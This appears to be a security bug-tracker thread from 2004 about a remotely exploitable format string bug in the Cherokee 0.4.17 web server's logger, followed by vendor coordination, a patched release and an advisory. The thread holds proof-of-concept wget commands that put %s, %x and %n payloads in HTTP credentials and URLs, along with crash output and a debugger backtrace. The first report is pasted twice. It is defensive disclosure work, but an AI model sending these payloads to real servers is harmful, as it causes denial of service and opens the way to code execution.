hi, i have found a remote exploitable formatstring bug in the Webserver cherokee-0.4.17. the affected function is located in logger_ncsa.c: cherokee_logger_ncsa_write_string(): ret_t cherokee_logger_ncsa_write_string (cherokee_logger_ncsa_t *logger, const char *string) { if (logger->accesslog_fd != NULL) { int ret; ret = fprintf (logger->accesslog_fd, string); return (ret > 0) ? ret_ok : ret_error; } syslog (LOG_INFO, "%s", string); return ret_ok; } this function is called, if a users authenticates to the server with username plus password (via auth_pam) in validator_pass.c: --- snip --- ret_t cherokee_validator_pam_check (cherokee_validator_pam_t *pam, cherokee_connection_t *conn) { ... /* Try to authenticate user: */ ret = _pam_dispatch (pamhandle, 0, 1); if (ret != PAM_SUCCESS) { cherokee_logger_write_string ( CONN_VSRV(conn)->logger, "PAM: user '%s' - not authenticated: %s", conn->user->buf, pam_strerror(pamhandle, ret)); goto unauthorized; } ... --- snip --- demonstration: client: bash-2.05b$ wget --http-user=%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x --http-passwd=%n%n%x http://127.0.0.1/private/index.html --01:12:39-- http://127.0.0.1/private/index.html => `index.html' Connecting to 127.0.0.1:80... connected. HTTP request sent, awaiting response... End of file while parsing headers. Retrying. --01:12:41-- http://127.0.0.1/private/index.html (try: 2) => `index.html' Connecting to 127.0.0.1:80... failed: Connection refused. bash-2.05b$ server: bender root # cherokee -C /etc/cherokee/cherokee.conf PHP interpreter not found (/usr/lib/cgi-bin/php4). Please install it. Cherokee Web Server 0.4.17: Listening on port 80, using poll, 1024 fds limit 5 threads, 204 fds in each, standard scheduling policy, TLS disabled Cherokee feels panic! Killed bender root # server log: you can find very interesting data in /var/log/cherokee.access: PAM: user '(null)0ö0öPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication module0ö$ìPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication modulePAM: user '%s' - not authenticated: %s
hi, i have found a remote exploitable formatstring bug in the Webserver cherokee-0.4.17. the affected function is located in logger_ncsa.c: cherokee_logger_ncsa_write_string(): ret_t cherokee_logger_ncsa_write_string (cherokee_logger_ncsa_t *logger, const char *string) { if (logger->accesslog_fd != NULL) { int ret; ret = fprintf (logger->accesslog_fd, string); return (ret > 0) ? ret_ok : ret_error; } syslog (LOG_INFO, "%s", string); return ret_ok; } this function is called, if a users authenticates to the server with username plus password (via auth_pam) in validator_pass.c: --- snip --- ret_t cherokee_validator_pam_check (cherokee_validator_pam_t *pam, cherokee_connection_t *conn) { ... /* Try to authenticate user: */ ret = _pam_dispatch (pamhandle, 0, 1); if (ret != PAM_SUCCESS) { cherokee_logger_write_string ( CONN_VSRV(conn)->logger, "PAM: user '%s' - not authenticated: %s", conn->user->buf, pam_strerror(pamhandle, ret)); goto unauthorized; } ... --- snip --- demonstration: client: bash-2.05b$ wget --http-user=%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x --http-passwd=%n%n%x http://127.0.0.1/private/index.html --01:12:39-- http://127.0.0.1/private/index.html => `index.html' Connecting to 127.0.0.1:80... connected. HTTP request sent, awaiting response... End of file while parsing headers. Retrying. --01:12:41-- http://127.0.0.1/private/index.html (try: 2) => `index.html' Connecting to 127.0.0.1:80... failed: Connection refused. bash-2.05b$ server: bender root # cherokee -C /etc/cherokee/cherokee.conf PHP interpreter not found (/usr/lib/cgi-bin/php4). Please install it. Cherokee Web Server 0.4.17: Listening on port 80, using poll, 1024 fds limit 5 threads, 204 fds in each, standard scheduling policy, TLS disabled Cherokee feels panic! Killed bender root # server log: you can find very interesting data in /var/log/cherokee.access: PAM: user '(null)0ö0öPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication module0ö$ìPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication modulePAM: user '%s' - not authenticated: %s 1@ìd@$G@Û/@$G@°.@°XPAM: user '(null)0ö0öPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication module0ö$ìPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication modulePAM: user '%s' - not authenticated: %s 1@ìd@$G@Û/@$G@ °.@¨X to be clear: the syslog() fkt is porperly protected - it happens one before... debugger attached to server: Attaching to program: /usr/sbin/cherokee, process 23158 Reading symbols from /usr/lib/libcherokee.so.0...done. Loaded symbols for /usr/lib/libcherokee.so.0 Reading symbols from /lib/libpthread.so.0...done. [Thread debugging using libthread_db enabled] [New Thread 16384 (LWP 23158)] [New Thread 32769 (LWP 23159)] [New Thread 16386 (LWP 23160)] [New Thread 32771 (LWP 23161)] [New Thread 49156 (LWP 23162)] [New Thread 65541 (LWP 23163)] Loaded symbols for /lib/libpthread.so.0 Reading symbols from /lib/libdl.so.2...done. Loaded symbols for /lib/libdl.so.2 Reading symbols from /lib/libc.so.6...done. [more symbols] Reading symbols from /usr/lib/cherokee/libcherokee_plain.so...done. Loaded symbols for /usr/lib/cherokee/libcherokee_plain.so 0x40165a11 in loser_poll () from /lib/libc.so.6 (gdb) step Single stepping until exit from function loser_poll, which has no line number information. [Switching to Thread 16384 (LWP 23158)] 0x40165aca in poll () from /lib/libc.so.6 (gdb) step Single stepping until exit from function poll, which has no line number information. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 65541 (LWP 23163)] 0x4011f753 in strlen () from /lib/libc.so.6 (gdb) backtrace #0 0x4011f753 in strlen () from /lib/libc.so.6 #1 0x400f6d29 in vfprintf () from /lib/libc.so.6 #2 0x400fcfef in fprintf () from /lib/libc.so.6 #3 0x4030292d in cherokee_logger_ncsa_write_string (logger=0x3a4d4150, string=0x267a <Address 0x267a out of bounds>) at logger_ncsa.c:295 #4 0x4003e7c8 in cherokee_logger_write_string (logger=0x806e150, format=0x3a4d4150 <Address 0x3a4d4150 out of bounds>) at logger.c:156 #5 0x402fdd55 in cherokee_validator_pam_check (pam=0x807ef10, conn=0x807e780) at validator_pam.c:180 #6 0x40042eb0 in cherokee_validator_check (validator=0x0, conn=0x3a4d4150) at validator.c:63 #7 0x40039d44 in cherokee_connection_check_authentication (cnt=0x807e780, plugin_entry=0x806ef18) at connection.c:1296 #8 0x4003f171 in process_active_connections (thd=0x807d090) at thread.c:460 #9 0x4003fce8 in cherokee_thread_step_MULTI_THREAD (thd=0x807d090, dont_block=false) at thread.c:1096 #10 0x4003eb84 in thread_routine (data=0x807d090) at thread.c:73 #11 0x4006b01f in pthread_start_thread () from /lib/libpthread.so.0 #12 0x4016ee6a in clone () from /lib/libc.so.6 (gdb) another impact: client: wget http://127.0.0.1/%s%s%s%s%s%s%s%s%s%s%s%s%s% [+x] %s serverlog: 127.0.0.1 - - [15/Oct/2004:01:30:58 +0100] "GET /%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$G@pP]è@P`,ú¿$G@`PX¤@P`$G@ÊÃ@``Dú¿$G@$G@`ï@`xú¿ «@ç´´▒©$G@Pçèü°ç$G@Ìû¿ë@u@;@à û¿;@à û¿°@øü¿¯@jî@à û¿ ¤@(@(@ ¤øÿ¿@µ@ ¤@▒øÿ¿$G@ØÌP(¨@ì ¤@u@ÀÀ'À!ý¿a¤ý¿¬ý¿ÿ¿ªÀ@0¤@ we're basically hitting the stack here... we can do everything, send shellcde, write .dtors, etc... Impact: -> a succesful exploitation of this bug leads to execution of arbitrary code (with server rights, of course) -> in case of unsuccessful exploitation, this leads to a denial of service. i think, this bug should be fixed upstream, therefore i have not attached a patch for this issue. author has _not_ yet been informed about this bug. best regards florian [rootshell]
Audit team, please peer-review this one before we take it to upstream and/or vendor-sec.
This is confirmed. Easy DoS, potential code execution (I'll have to spend more time on that part; I haven't managed RCE yet). Time to contact the Cherokee dev team and possibly forward to vendor-sec. I'm writing to them now. Thanks, rootshell.
Krispy: don't forget to credit Florian if you write directly upstream. Maybe it's best if he writes to them himself. klieber/solar: do you think this one needs to be coordinated with vendor-sec ? Who ships cherokee ?
hi, i just got this email (as CC) from chreokee maintainer: -- mail -- Hi Dan, First of all, thank you very much for the report :-) There are two patched versions that correct this bug: - The 0.4.17.1: It is the fixed 0.4.17: ftp://alobbs.com/cherokee/0.4/0.4.17/cherokee-0.4.17.1.tar.gz - The 0.4.18b25: It is a beta of the incoming release of Cherokee. It contains new features, but of are unfinished yet: http://alobbs.com/tmp/cherokee-0.4.18b25.tar.gz -- eof -- so please bump up to version 0.4.17.1 save to go public now... best regards florian [rootshell]
this is the debian maintainer, btw: http://people.debian.org/~rcardenes/#cherokee seems, that other distributions do _not_ ship cherokee by default... (at least i cant find 'official' rpms) best regards florian [rootshell]
Stuart please provide an updated ebuild or CC the right dev as this is not a public bug.
Updated ebuild committed, and marked stable on x86. Just needs marking stable on ppc now.
CC'ing pvdabeel instead of ppc as this bug is not public. Pieter please test and mark 0.4.17.1 stable.
This is public now (see http://alobbs.com/) ppc: please mark stable.
Stable on ppc.
GLSA 200411-02